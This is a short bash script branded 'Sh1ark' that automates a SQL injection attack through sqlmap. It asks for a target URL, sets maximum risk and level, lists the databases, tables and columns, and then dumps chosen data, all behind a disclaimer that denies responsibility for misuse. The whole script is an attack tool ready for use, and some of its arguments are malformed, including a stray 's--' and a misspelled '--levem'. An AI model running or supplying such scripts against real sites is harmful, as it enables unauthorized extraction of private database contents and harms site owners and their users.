#!/bin/bash
b="\33[34;3m"
r="\33[31;1m"
g="\33[32;1m"
y="\33[33;1m"
cyan="\33[36;1m"
wh="\33[43;0m"
clear
echo "$g
 	     $y Tool By Sh1ark$g
          
     ██████  ██░ ██  ▄▄▄       ██▀███   ██ ▄█▀
   ▒██    ▒ ▓██░ ██▒▒████▄    ▓██ ▒ ██▒ ██▄█▒ 
   ░ ▓██▄   ▒██▀▀██░▒██  ▀█▄  ▓██ ░▄█ ▒▓███▄░ 
     ▒   ██▒░▓█ ░██ ░██▄▄▄▄██ ▒██▀▀█▄  ▓██ █▄ 
   ▒██████▒▒░▓█▒░██▓ ▓█   ▓██▒░██▓ ▒██▒▒██▒ █▄
   ▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒ ▒▒   ▓▒█░░ ▒▓ ░▒▓░▒ ▒▒ ▓▒
   ░ ░▒  ░ ░ ▒ ░▒░ ░  ▒   ▒▒ ░  ░▒ ░ ▒░░ ░▒ ▒░
                                            
        $r    Press EnTer  To continue
"
read VB


echo "
$y|*Hit*$cyan|I do not take any responsibility for any misuse of this script !|"
echo "$b"
read -p "URL :" sql
sleep 0.5
echo "$cyan [INFO]$wh SET URL To $sql $b"
read -p "Level [ Choose 3 ]: " level
sleep 0.5
echo "$cyan [INFO]$wh SET LEVEL To $level $b"
read -p "Risk  [ choose 3 ]: " risk
sleep 0.5 
echo "$cyan [INFO]$wh SET RISK To $risk $b"
read -p "[?] Press Enter To Start : " cid
echo "$cyan [INFO] SHark is Started ! $b"
sqlmap -u $sql --dbs s-- --risk=$risk --level=$level --batch
read -p "If The Database Showing In Terminal Enter it : " ter
sqlmap -u $sql -D $ter --tables s-- --risk=$risk --level=$level --batch
read -p "Choose A Table : " col
sqlmap -u $sql -D $ter -T $col --columns s-- --risk=$risk --level=$level --batch
read -p "Choose Column : " colm
sqlmap -u $sql -D $ter -T $col -C $colm --dump s-- --risk=$risk --levem=$level --batch
echo "$g [INFO]$wh Finished ! Happy Sharking |"
